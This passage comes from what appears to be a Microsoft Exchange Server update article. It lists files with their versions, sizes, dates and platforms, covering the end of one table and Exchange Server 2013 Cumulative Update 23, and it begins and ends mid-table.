Not applicable| 73,233| 04-Apr-2021| 10:24| Not applicable \nProductinfo.managed.dll| 15.1.2176.12| 27,008| 04-Apr-2021| 10:22| x86 \nProxybinclientsstringsdll| 15.1.2176.12| 924,544| 04-Apr-2021| 10:22| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,242| 04-Apr-2021| 10:24| Not applicable \nQuietexe.exe| 15.1.2176.12| 14,728| 04-Apr-2021| 10:27| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,540| 04-Apr-2021| 10:24| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,639| 04-Apr-2021| 10:23| Not applicable \nRemoteexchange.ps1| Not applicable| 23,601| 04-Apr-2021| 10:26| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,688| 04-Apr-2021| 10:24| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,006| 04-Apr-2021| 10:24| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,016| 04-Apr-2021| 10:23| Not applicable \nReplaycrimsonmsg.dll| 15.1.2176.12| 1,099,136| 04-Apr-2021| 10:26| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,504| 04-Apr-2021| 10:23| Not applicable \nResetcasservice.ps1| Not applicable| 21,711| 04-Apr-2021| 10:24| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,105| 04-Apr-2021| 10:23| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,145| 04-Apr-2021| 10:26| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,198| 04-Apr-2021| 10:24| Not applicable \nRightsmanagementwrapper.dll| 15.1.2176.12| 86,400| 04-Apr-2021| 10:26| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,794| 04-Apr-2021| 10:23| Not applicable \nRpcperf.dll| 15.1.2176.12| 23,424| 04-Apr-2021| 10:27| x64 \nRpcproxyshim.dll| 15.1.2176.12| 39,296| 04-Apr-2021| 10:24| x64 \nRulesauditmsg.dll| 15.1.2176.12| 12,672| 04-Apr-2021| 10:26| x64 \nRwsperfcounters.xml| Not applicable| 23,000| 04-Apr-2021| 10:22| Not applicable \nSafehtmlnativewrapper.dll| 15.1.2176.12| 34,680| 04-Apr-2021| 10:27| x64 \nScanenginetest.exe| 15.1.2176.12| 956,288| 04-Apr-2021| 10:22| x64 \nScanningprocess.exe| 15.1.2176.12| 739,200| 04-Apr-2021| 10:22| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,816| 04-Apr-2021| 10:23| Not applicable \nServicecontrol.ps1| Not applicable| 52,333| 04-Apr-2021| 10:24| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,758| 04-Apr-2021| 10:24| Not applicable \nSettingsadapter.dll| 15.1.2176.12| 116,096| 04-Apr-2021| 10:22| x64 \nSetup.exe| 15.1.2176.12| 20,864| 04-Apr-2021| 10:22| x86 \nSetupui.exe| 15.1.2176.12| 49,032| 04-Apr-2021| 10:26| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,193| 04-Apr-2021| 10:23| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,835| 04-Apr-2021| 10:24| Not applicable \nStatisticsutil.dll| 15.1.2176.12| 142,208| 04-Apr-2021| 10:24| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,121| 04-Apr-2021| 10:23| Not applicable \nStoretsconstants.ps1| Not applicable| 15,818| 04-Apr-2021| 10:22| Not applicable \nStoretslibrary.ps1| Not applicable| 27,991| 04-Apr-2021| 10:22| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.2176.12| 28,552| 04-Apr-2021| 10:23| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,931| 04-Apr-2021| 10:24| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,977| 04-Apr-2021| 10:23| Not applicable \nTextconversionmodule.dll| 15.1.2176.12| 86,400| 04-Apr-2021| 10:23| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,715| 04-Apr-2021| 10:22| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,421| 04-Apr-2021| 10:21| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,033| 04-Apr-2021| 10:22| Not applicable \nUmservice.exe| 15.1.2176.12| 100,216| 04-Apr-2021| 10:26| x86 \nUmworkerprocess.exe| 15.1.2176.12| 38,296| 04-Apr-2021| 10:27| x86 \nUninstall_antispamagents.ps1| Not applicable| 15,477| 04-Apr-2021| 10:24| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,034| 04-Apr-2021| 10:24| Not applicable \nUpdatecas.ps1| Not applicable| 32,952| 04-Apr-2021| 10:26| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,746| 04-Apr-2021| 10:26| Not applicable \nUpdateserver.exe| 15.1.2176.12| 3,014,536| 04-Apr-2021| 10:22| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,160| 04-Apr-2021| 10:23| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,816| 04-Apr-2021| 10:24| Not applicable \nWsbexchange.exe| 15.1.2176.12| 125,328| 04-Apr-2021| 10:26| x64 \nX400prox.dll| 15.1.2176.12| 103,304| 04-Apr-2021| 10:26| x64 \n_search.lingoperators.a| 15.1.2176.12| 34,696| 04-Apr-2021| 10:23| Not applicable \n_search.lingoperators.b| 15.1.2176.12| 34,696| 04-Apr-2021| 10:23| Not applicable \n_search.mailboxoperators.a| 15.1.2176.12| 289,168| 04-Apr-2021| 10:23| Not applicable \n_search.mailboxoperators.b| 15.1.2176.12| 289,168| 04-Apr-2021| 10:23| Not applicable \n_search.operatorschema.a| 15.1.2176.12| 483,200| 04-Apr-2021| 10:22| Not applicable \n_search.operatorschema.b| 15.1.2176.12| 483,200| 04-Apr-2021| 10:22| Not applicable \n_search.tokenoperators.a| 15.1.2176.12| 106,904| 04-Apr-2021| 10:23| Not applicable \n_search.tokenoperators.b| 15.1.2176.12| 106,904| 04-Apr-2021| 10:23| Not applicable \n_search.transportoperators.a| 15.1.2176.12| 64,904| 04-Apr-2021| 10:23| Not applicable \n_search.transportoperators.b| 15.1.2176.12| 64,904| 04-Apr-2021| 10:23| Not applicable \n \n#### \n\n__\n\nMicrosoft Exchange Server 2013 Cumulative Update 23\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nAdduserstopfrecursive.ps1| Not applicable| 15,058| 04-Apr-2021| 10:33| Not applicable \nAjaxcontroltoolkit.dll| 15.0.1497.15| 96,688| 04-Apr-2021| 10:34| x86 \nCafe_owaauth_dll| 15.0.1497.15| 91,576| 04-Apr-2021| 10:33| x64 \nCheckinvalidrecipients.ps1| Not applicable| 23,125| 04-Apr-2021| 10:33| Not applicable \nCitsconstants.ps1| Not applicable| 15,869| 04-Apr-2021| 10:34| Not applicable \nCitslibrary.ps1| Not applicable| 82,724| 04-Apr-2021| 10:33| Not applicable \nCitstypes.ps1| Not applicable| 14,528| 04-Apr-2021| 10:34| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 30,011| 04-Apr-2021| 10:33| Not applicable \nConfigureadam.ps1| Not applicable| 23,387| 04-Apr-2021| 10:33| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 19,981| 04-Apr-2021| 10:33| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,352| 04-Apr-2021| 10:33| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,907| 04-Apr-2021| 10:33| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,336| 04-Apr-2021| 10:33| Not applicable \nConnectfunctions.ps1| Not applicable| 38,383| 04-Apr-2021| 10:33| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,396| 04-Apr-2021| 10:33| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,312| 04-Apr-2021| 10:33| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,133| 04-Apr-2021| 10:33| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,612| 04-Apr-2021| 10:33| Not applicable \nCts_microsoft.exchange.data.common.dll| 15.0.1497.15| 1,653,232| 04-Apr-2021| 10:34| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,398| 04-Apr-2021| 10:34| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,442| 04-Apr-2021| 10:33| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,269| 04-Apr-2021| 10:33| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,754| 04-Apr-2021| 10:33| Not applicable \nDup_cts_microsoft.exchange.data.common.dll| 15.0.1497.15| 1,653,232| 04-Apr-2021| 10:34| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.0.1497.15| 396,760| 04-Apr-2021| 10:36| x86 \nEdgetransport.exe| 15.0.1497.15| 40,936| 04-Apr-2021| 10:34| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,444| 04-Apr-2021| 10:33| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,643| 04-Apr-2021| 10:33| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,678| 04-Apr-2021| 10:33| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,979| 04-Apr-2021| 10:33| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,727| 04-Apr-2021| 10:33| Not applicable \nExchange.depthtwo.types.ps1xml| Not applicable| 38,403| 04-Apr-2021| 10:33| Not applicable \nExchange.format.ps1xml| Not applicable| 502,270| 04-Apr-2021| 10:33| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 32,625| 04-Apr-2021| 10:33| Not applicable \nExchange.ps1| Not applicable| 20,599| 04-Apr-2021| 10:33| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,622| 04-Apr-2021| 10:33| Not applicable \nExchange.types.ps1xml| Not applicable| 334,337| 04-Apr-2021| 10:33| Not applicable \nExchucutil.ps1| Not applicable| 24,000| 04-Apr-2021| 10:33| Not applicable \nExportedgeconfig.ps1| Not applicable| 27,471| 04-Apr-2021| 10:33| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 36,610| 04-Apr-2021| 10:33| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,209| 04-Apr-2021| 10:33| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,124| 04-Apr-2021| 10:33| Not applicable \nExrpc32.dll| 15.0.1497.15| 1,683,368| 04-Apr-2021| 10:34| x64 \nExsetdata.dll| 15.0.1497.15| 1,749,944| 04-Apr-2021| 10:33| x64 \nExsetup.exe| 15.0.1497.15| 35,336| 04-Apr-2021| 10:37| x86 \nExsetupui.exe| 15.0.1497.15| 199,152| 04-Apr-2021| 10:35| x86 \nExt_microsoft.exchange.data.transport.dll| 15.0.1497.15| 396,760| 04-Apr-2021| 10:36| x86 \nFil00a59b0bf9ad6dbefafaeb21bc52cadc| Not applicable| 160,921| 10-Sep-2020| 08:09| Not applicable \nFil01265e3f95fffa90f103d6045ee1b646| Not applicable| 207,584| 10-Sep-2020| 08:08| Not applicable \nFil01464b610a1b9ca44bfd4aa2b20a0a47| Not applicable| 242,360| 10-Sep-2020| 08:08| Not applicable \nFil024514f3668d7fae2909c604a07f2cae| Not applicable| 118,512| 10-Sep-2020| 08:09| Not applicable \nFil02886dbc65954c74ff5f004a4de087d0| Not applicable| 382,584| 10-Sep-2020| 08:10| Not applicable \nFil02aa6af1a7515d4d79a36ff53c2451cc| Not applicable| 202,224| 10-Sep-2020| 08:10| Not applicable \nFil03094a694b8e463b811188f1414aafd9| Not applicable| 1,562| 10-Sep-2020| 08:10| Not applicable \nFil0346bb60fed433908e0d629870fa234f| Not applicable| 42,453| 10-Sep-2020| 08:10| Not applicable \nFil03d6f5ce7cdbd650b4e31b9b17bfebdf| Not applicable| 63,034| 10-Sep-2020| 08:09| Not applicable \nFil03df293f7a64512c7994f03b06b1cc9d| Not applicable| 122,028| 10-Sep-2020| 08:08| Not applicable \nFil04648c9ff8319a4b2f4228ef41f3d558| Not applicable| 188,610| 10-Sep-2020| 08:09| Not applicable \nFil04be20231e54d4b1b9ae0adcee287d33| Not applicable| 3,319| 10-Sep-2020| 08:10| Not applicable \nFil05bd0d7761664f4f3447bc8b82cba551| Not applicable| 260,796| 10-Sep-2020| 08:08| Not applicable \nFil07291eda8c3b4bef35c20b117bc4dc89| Not applicable| 11,065| 10-Sep-2020| 08:03| Not applicable \nFil073611cea59a04ae5959ec5466f4f770| Not applicable| 206,119| 10-Sep-2020| 08:10| Not applicable \nFil07a54aa7bb7bff7a7ebaa792bbf2dcc3| Not applicable| 12,920| 10-Sep-2020| 08:10| Not applicable \nFil07d1178f9b4ec96c22a8240722e0bf9f| Not applicable| 381,584| 10-Sep-2020| 08:09| Not applicable \nFil0807d7ff1190d89482f9590435e63704| Not applicable| 376,675| 10-Sep-2020| 08:09| Not applicable \nFil08a4c36edaa0a358721425799ae714fa| Not applicable| 243,898| 10-Sep-2020| 08:08| Not applicable \nFil092fbdf7953d47bcaec4c494ad2a4620| Not applicable| 142,751| 10-Sep-2020| 08:11| Not applicable \nFil093c3f7e3d75f52ac3ae90f8d5c582cc| Not applicable| 229,663| 10-Sep-2020| 08:08| Not applicable \nFil095e2ae2aad7e5fe67147fa275cf3657| Not applicable| 200,119| 10-Sep-2020| 08:09| Not applicable \nFil097d6a2a5acff36af3b3de457fece43f| Not applicable| 317,272| 10-Sep-2020| 08:08| Not applicable \nFil098cd77950ecc93e59a6d478029be507| Not applicable| 2,003,210| 10-Sep-2020| 08:06| Not applicable \nFil0994fb28dc0ef8f87218c621ae86e134| Not applicable| 286,293| 10-Sep-2020| 08:11| Not applicable \nFil0aff9b8e03ff8a9bb1517388f2c44d1a| Not applicable| 14,524| 10-Sep-2020| 08:10| Not applicable \nFil0bfa47954dd042005e90c2bd01cd0a37| Not applicable| 142,850| 10-Sep-2020| 08:08| Not applicable \nFil0d721f7ce4137c3bd63bdc89da0bb5cb| Not applicable| 236,086| 10-Sep-2020| 08:08| Not applicable \nFil0dbb9c355360df6a4459d2007004c9e3| Not applicable| 208,728| 10-Sep-2020| 08:10| Not applicable \nFil0dcd409d2cf1a0fe1b1d23995972047e| Not applicable| 264,787| 10-Sep-2020| 08:09| Not applicable \nFil0dd00b83250a9921930f80dfadd64420| Not applicable| 167,266| 10-Sep-2020| 08:10| Not applicable \nFil0ee631acb4cbeba6a8ce8838790ffba3| Not applicable| 225,959| 10-Sep-2020| 08:08| Not applicable \nFil0fe6c543ad5dce68f8da1d128ebff332| Not applicable| 303,122| 10-Sep-2020| 08:10| Not applicable \nFil0fefc0bb7650de7a8e100f27290b316c| Not applicable| 939| 10-Sep-2020| 08:10| Not applicable \nFil1049e7dbf56476ddca7fbcdd54f1b796| Not applicable| 146,378| 10-Sep-2020| 08:10| Not applicable \nFil11364618faea90d632e254088444fc52| Not applicable| 3,359| 10-Sep-2020| 08:10| Not applicable \nFil1173f6b39fe7c9d910b8dc5bd19521f8| Not applicable| 361,118| 10-Sep-2020| 08:09| Not applicable \nFil119e3a5d3db8bc97fc7e5f8e81f2f8ca| Not applicable| 197,448| 10-Sep-2020| 08:08| Not applicable \nFil1270dc39571f9c7aa6cfaadeff4f3640| Not applicable| 171,559| 10-Sep-2020| 08:07| Not applicable \nFil129c1192b00260084863bfb442d9ef93| Not applicable| 1,303| 10-Sep-2020| 08:10| Not applicable \nFil13fb2417bf46b85b2993d051b8ab7c66| Not applicable| 330,130| 10-Sep-2020| 08:08| Not applicable \nFil1426532f337ffd248ad8526e66f9fed6| Not applicable| 147,629| 10-Sep-2020| 08:09| Not applicable \nFil1591caf2c0ed95d3d7dc675a20701ee6| Not applicable| 114,064| 10-Sep-2020| 08:08| Not applicable \nFil15f38a12988013e8d68ce239be0d5f3d| Not applicable| 171,283| 10-Sep-2020| 08:08| Not applicable \nFil162350ffb26be403359faaf6c45406cf| Not applicable| 163,899| 10-Sep-2020| 08:08| Not applicable \nFil162b0371ffc6ab85232d5f1c2f4997e7| Not applicable| 9,782| 10-Sep-2020| 08:10| Not applicable \nFil1696980eba48067e2ae900f45faad78e| Not applicable| 1,875| 10-Sep-2020| 08:10| Not applicable \nFil16fca2f0aaead1fbec7a463ca606a1ec| Not applicable| 370,126| 10-Sep-2020| 08:08| Not applicable \nFil19183400565ab2ccc44ecaa477a5e3d1| Not applicable| 15,230| 10-Sep-2020| 08:03| Not applicable \nFil199e6bdb4f3b2b47c763319633da1136| Not applicable| 327,350| 10-Sep-2020| 08:08| Not applicable \nFil19ccdd118db9bfc3475814a4b4e08c08| Not applicable| 584,377| 10-Sep-2020| 08:08| Not applicable \nFil1a3b1da5816e3bb64056cf149788066b| Not applicable| 480,547| 10-Sep-2020| 08:10| Not applicable \nFil1ac6267c3eb50d8e405d35e06e7c7878| Not applicable| 15,933| 10-Sep-2020| 08:10| Not applicable \nFil1b70faaee4a16f481d3565f701d210d2| Not applicable| 194,186| 10-Sep-2020| 08:10| Not applicable \nFil1bb83920715900f568a44fea64ebdf14| Not applicable| 409,070| 10-Sep-2020| 08:10| Not applicable \nFil1bbf3e38efe960ca2113daaab481b364| Not applicable| 3,474| 10-Sep-2020| 08:10| Not applicable \nFil1e3e47d491e73bf0ce9bd6368a869661| Not applicable| 114,721| 10-Sep-2020| 08:09| Not applicable \nFil1ebaeefd7727d6252ca22a5e152fc343| Not applicable| 8,138| 10-Sep-2020| 08:10| Not applicable \nFil1f3158c2364004336fefd7fa8c62086b| Not applicable| 327,640| 10-Sep-2020| 08:09| Not applicable \nFil1f475a8603a1bbd01e1a40d53c813c9c| Not applicable| 315,635| 10-Sep-2020| 08:10| Not applicable \nFil1fff4b705c9647b4ff3f83b020b2e237| Not applicable| 370,164| 10-Sep-2020| 08:10| Not applicable \nFil2039f6f47019d7eb8d50a7d7387e1326| Not applicable| 118,107| 10-Sep-2020| 08:10| Not applicable \nFil208b9e5328593cd0b5013b4cae2713f9| Not applicable| 335,423| 10-Sep-2020| 08:08| Not applicable \nFil2093384b2fd2dd4694e4452e9aacfc18| Not applicable| 383,683| 10-Sep-2020| 08:07| Not applicable \nFil20b9a11913964b245854e564a94544ed| Not applicable| 144,647| 10-Sep-2020| 08:08| Not applicable \nFil20e584fabe14655761b29e602eed5cc9| Not applicable| 182,170| 10-Sep-2020| 08:07| Not applicable \nFil2143e07c2cac620dfefafd058902b0d3| Not applicable| 2,915| 10-Sep-2020| 08:10| Not applicable \nFil222a09c547b07ae712f31cf9175a5717| Not applicable| 116,530| 10-Sep-2020| 08:08| Not applicable \nFil2294c86871eb9882419d11de13a0e558| Not applicable| 866| 10-Sep-2020| 08:10| Not applicable \nFil2294eb56822388c24312aee15bef4d72| Not applicable| 3,423| 10-Sep-2020| 08:10| Not applicable \nFil235c6fa467f8662a9bcbd6fac8df465b| Not applicable| 117,287| 10-Sep-2020| 08:07| Not applicable \nFil240bcf2747ef1821d63068b04d54a07d| Not applicable| 163,794| 10-Sep-2020| 08:11| Not applicable \nFil24622e71b4f201522c30b5396079ebf9| Not applicable| 151,701| 10-Sep-2020| 08:08| Not applicable \nFil247b22302db2287f03bd385ba61ffe55| Not applicable| 398,137| 10-Sep-2020| 08:07| Not applicable \nFil25727a6a764ebd6cd89550c2c031c37c| Not applicable| 160,115| 10-Sep-2020| 08:08| Not applicable \nFil265b8ec6d4ed498b5382cfc1027491a2| Not applicable| 82,741| 10-Sep-2020| 08:09| Not applicable \nFil280c8cbd4386b442b5c94af6708eaac8| Not applicable| 16,625| 10-Sep-2020| 08:10| Not applicable \nFil283358d58bb98df0557b67b6f747c86a| Not applicable| 460,146| 10-Sep-2020| 08:07| Not applicable \nFil28b2b9d1b7e313e502a8835045c2d0d0| Not applicable| 15,031| 10-Sep-2020| 08:10| Not applicable \nFil2a6b0663833d438eea50ffe81c51ec83| Not applicable| 2,003,228| 10-Sep-2020| 08:05| Not applicable \nFil2adab262add65203b0c7c5bc1251e47f| Not applicable| 312,638| 10-Sep-2020| 08:08| Not applicable \nFil2b2ac38f6e7b4a0553da72f403582cd5| Not applicable| 1,727| 10-Sep-2020| 08:10| Not applicable \nFil2bd8c15c9164155f212951a70631823f| Not applicable| 5,285| 10-Sep-2020| 08:10| Not applicable \nFil2c21ffd8eb5ecd0f7c89a27b86951a7d| Not applicable| 10,821| 10-Sep-2020| 08:09| Not applicable \nFil2db733aabd2264a64057e89820aca13c| Not applicable| 13,759| 10-Sep-2020| 08:10| Not applicable \nFil2e63bcb4a6d04e10c147a6c3f92bfcab| Not applicable| 670,945| 10-Sep-2020| 08:09| Not applicable \nFil2e6b2f8c3954b6bbc8ab2a22d1438d67| Not applicable| 114,990| 10-Sep-2020| 08:09| Not applicable \nFil2eba4c3b1398dc2169d3a58cf26d7494| Not applicable| 3,169| 10-Sep-2020| 08:10| Not applicable \nFil2f58bbe281f35794e1fadfd2d5372340| Not applicable| 151,951| 10-Sep-2020| 08:09| Not applicable \nFil31e9f5684b0b5ea70746907556f64515| Not applicable| 296,876| 10-Sep-2020| 08:09| Not applicable \nFil32c87816f9a713092dc110787ef42586| Not applicable| 35,050| 10-Sep-2020| 08:08| Not applicable \nFil32ede05fb6827d1a783e56be2937e471| Not applicable| 153,091| 10-Sep-2020| 08:08| Not applicable \nFil344d9c6f4f02142eba8c624f965acd67| Not applicable| 121,941| 10-Sep-2020| 08:08| Not applicable \nFil363d000c227039f27c69b128287ff68e| Not applicable| 186,041| 10-Sep-2020| 08:07| Not applicable \nFil36da999539f10f4939d3c19fb7e77d53| Not applicable| 11,324| 10-Sep-2020| 08:09| Not applicable \nFil37589a1bee605be2ae1422c6d19521cd| Not applicable| 384,396| 10-Sep-2020| 08:09| Not applicable \nFil3804327ae3bca4c1a589eed2acaf0909| Not applicable| 1,739| 10-Sep-2020| 08:10| Not applicable \nFil38494a0e60def94d88e8724029463551| Not applicable| 83,497| 10-Sep-2020| 08:07| Not applicable \nFil3859e6d9c6cf748d05be23536b9221c4| Not applicable| 124,060| 10-Sep-2020| 08:10| Not applicable \nFil39ee1f35ad97bd462c3ac5aec000a1c0| Not applicable| 210,413| 10-Sep-2020| 08:10| Not applicable \nFil3a42ef50a1ae3edbb7a00bc22f3434e3| Not applicable| 24,337| 10-Sep-2020| 08:03| Not applicable \nFil3b12709b2a6d1f6a5a9d96edbc2a9dd2| Not applicable| 211,288| 10-Sep-2020| 08:09| Not applicable \nFil3b8cc2b36f720baad95be0910e9346eb| Not applicable| 154,799| 10-Sep-2020| 08:10| Not applicable \nFil3c3fb88b0193db7b45726833c054d1ed| Not applicable| 4,920| 10-Sep-2020| 08:10| Not applicable \nFil3cccb1e1cc9707666a7232847b28158a| Not applicable| 148,810| 10-Sep-2020| 08:10| Not applicable \nFil3d3af8f03141aadd16d3951f471e4ecd| Not applicable| 472,586| 10-Sep-2020| 08:10| Not applicable \nFil3d952efb9613d0f0fa9c884c2e197c47| Not applicable| 64,742| 10-Sep-2020| 08:07| Not applicable \nFil3d96340571dcbbca40f9dda36cf8cc23| Not applicable| 376,491| 10-Sep-2020| 08:08| Not applicable \nFil3db21a7c265bee0f8897197ab8184cbb| Not applicable| 407,449| 10-Sep-2020| 08:11| Not applicable \nFil3e7cd5352ab27351d37dc5a0d70eb5da| Not applicable| 8,202| 10-Sep-2020| 08:10| Not applicable \nFil401dc81859f7ddf0518e04d60fb6f0f0| Not applicable| 127,242| 10-Sep-2020| 08:08| Not applicable \nFil4032894f9d18775fe5b8f517b9446ed2| Not applicable| 247,259| 10-Sep-2020| 08:09| Not applicable \nFil426e71bd7d39fbdac2f9aac2641b16f3| Not applicable| 1,923| 10-Sep-2020| 08:10| Not applicable \nFil4278d1df336a84435b4ce9034fb1a172| Not applicable| 718| 10-Sep-2020| 08:10| Not applicable \nFil42a5edd14a3d3f555fcd6172e48921fb| Not applicable| 157,961| 10-Sep-2020| 08:09| Not applicable \nFil42c22971f1d5dc2196265e92d6da872f| Not applicable| 150,392| 10-Sep-2020| 08:11| Not applicable \nFil442f08df8632cfa5f8638445f7151f04| Not applicable| 956| 10-Sep-2020| 08:10| Not applicable \nFil449a3b586a9163232e7d21b204dff9e2| Not applicable| 1,316| 10-Sep-2020| 08:10| Not applicable \nFil44a698d38545e9cd051d9db8fdfc900e| Not applicable| 225,606| 10-Sep-2020| 08:10| Not applicable \nFil44afe89b21b16bf4b609ab451085526a| Not applicable| 373,865| 10-Sep-2020| 08:08| Not applicable \nFil44d189470b9393ed19ca08defd240a38| Not applicable| 216,698| 10-Sep-2020| 08:10| Not applicable \nFil45cd37ad6b0169d99d0eb6dcba7d08d9| Not applicable| 166,781| 10-Sep-2020| 08:10| Not applicable \nFil46233812dcee5af00423b2fc332d0c5d| Not applicable| 2,015,045| 10-Sep-2020| 08:05| Not applicable \nFil46ef8081ccac6e0c239c52cfc8c58dcf| Not applicable| 4,743| 10-Sep-2020| 08:07| Not applicable \nFil476b430823a50cf77d9968f03858d69d| Not applicable| 359,078| 10-Sep-2020| 08:08| Not applicable \nFil481ea15e0071beee36e6711fe55c7372| Not applicable| 307,725| 10-Sep-2020| 08:08| Not applicable \nFil4a3306ef5eda0d022a521f8bd6c3d940| Not applicable| 158,115| 10-Sep-2020| 08:08| Not applicable \nFil4a79082a6a63aa24efbd3f71b1a9f8e8| Not applicable| 139,064| 10-Sep-2020| 08:09| Not applicable \nFil4aa30f91267dc1dffacc9bb3f9e43367| Not applicable| 1,972| 10-Sep-2020| 08:10| Not applicable \nFil4b622a1d73e8a02febd3ad6f59e8b98c| Not applicable| 12,107| 10-Sep-2020| 08:10| Not applicable \nFil4bc634eae6f3c142c6ed8d2927520cc3| Not applicable| 5,653| 10-Sep-2020| 08:10| Not applicable \nFil4bd7eb36b7c3567f715d5365f8047204| Not applicable| 142,286| 10-Sep-2020| 08:10| Not applicable \nFil4c0ab8720533c89e68ce63e86d429dde| Not applicable| 381,163| 10-Sep-2020| 08:08| Not applicable \nFil4c177d04b538b102de0bc7af504ade88| Not applicable| 1,264| 10-Sep-2020| 08:10| Not applicable \nFil4cc43ed047118c3c70489c99f391ad41| Not applicable| 570,339| 10-Sep-2020| 08:08| Not applicable \nFil4cfa7a61721252f62fb29a0f1805bd48| Not applicable| 151,467| 10-Sep-2020| 08:09| Not applicable \nFil4d0f14d8c2b6b77898bcc5954a8335d4| Not applicable| 12,161| 10-Sep-2020| 08:10| Not applicable \nFil4d393ab247c2ec19d982c087d694252e| Not applicable| 485,168| 10-Sep-2020| 08:09| Not applicable \nFil4e4dfdf527ace3b42d88eaea58ad4e00| Not applicable| 110,057| 10-Sep-2020| 08:11| Not applicable \nFil4f050d584b052cef56c611c7a6fc0b4d| Not applicable| 440,314| 10-Sep-2020| 08:10| Not applicable \nFil4f0ff802c3382fc6cb28e90145915a91| Not applicable| 155,232| 10-Sep-2020| 08:08| Not applicable \nFil4fbdcc69c6687636e427226aab76d82c| Not applicable| 165,120| 10-Sep-2020| 08:08| Not applicable \nFil50c8b757b4933533069fdb8f6b905e0d| Not applicable| 158,190| 10-Sep-2020| 08:09| Not applicable \nFil50e303dde9fe96807796a25979e2814a| Not applicable| 252,966| 10-Sep-2020| 08:08| Not applicable \nFil538089ef224df4976d311e8302364c00| Not applicable| 1,152,608| 10-Sep-2020| 08:12| Not applicable \nFil5387207480a1873bc7ed50c9eaed89c7| Not applicable| 2,003,225| 10-Sep-2020| 08:06| Not applicable \nFil53acea05108c4f46ff21c66f40cfaeec| Not applicable| 150,387| 10-Sep-2020| 08:08| Not applicable \nFil540e2d0af94e0e486cae7a4a9e109676| Not applicable| 215,778| 10-Sep-2020| 08:10| Not applicable \nFil541882cdf469df98dbf0ac462de46344| Not applicable| 575,597| 10-Sep-2020| 08:09| Not applicable \nFil543079c26bd28998e4563bbd4cac1644| Not applicable| 4,186| 10-Sep-2020| 08:10| Not applicable \nFil54337210b89f5380a40a0904d6d860f8| Not applicable| 1,729| 10-Sep-2020| 08:10| Not applicable \nFil5542b08a74ea880a5f2bd8b269fc1231| Not applicable| 250,545| 10-Sep-2020| 08:09| Not applicable \nFil57beb556aec2d6e97c7b317de9f72304| Not applicable| 322,662| 10-Sep-2020| 08:08| Not applicable \nFil57fcce90719eee5eff1f954327649e53| Not applicable| 222,952| 10-Sep-2020| 08:08| Not applicable \nFil58337dc668f3e1a94ebd035dc310ef3a| Not applicable| 3,653| 10-Sep-2020| 08:10| Not applicable \nFil59074b5deefeb2b4d32b58953cb77f9e| Not applicable| 202,678| 10-Sep-2020| 08:07| Not applicable \nFil596d2b532682a216aced5af81a34785e| Not applicable| 371,817| 10-Sep-2020| 08:08| Not applicable \nFil5aef2df4d623713792ff2e54a0abea77| Not applicable| 3,391| 10-Sep-2020| 08:10| Not applicable \nFil5b481af97947b02636fefbad6cf5332e| Not applicable| 10,504| 10-Sep-2020| 08:10| Not applicable \nFil5b51bde4cf501f9d89d6fdd6084fb0dc| Not applicable| 76,238| 10-Sep-2020| 08:07| Not applicable \nFil5c8127dbccdda444e35671ff4a274fc5| Not applicable| 164,462| 10-Sep-2020| 08:08| Not applicable \nFil5cd88aaf0a21ddb716f1da478f29fe22| Not applicable| 68,607| 10-Sep-2020| 08:03| Not applicable \nFil5d2722dc3289787a79451240b7a88ef3| Not applicable| 1,218| 10-Sep-2020| 08:10| Not applicable \nFil5d6827cff217e4dfce3affa1aa55d8f3| Not applicable| 476,341| 10-Sep-2020| 08:09| Not applicable \nFil5e56ac7a5a17eeba25534e146a5b96c5| Not applicable| 187,286| 10-Sep-2020| 08:10| Not applicable \nFil5f4f6a29ca46dc40a4f6ac9b8b772ce3| Not 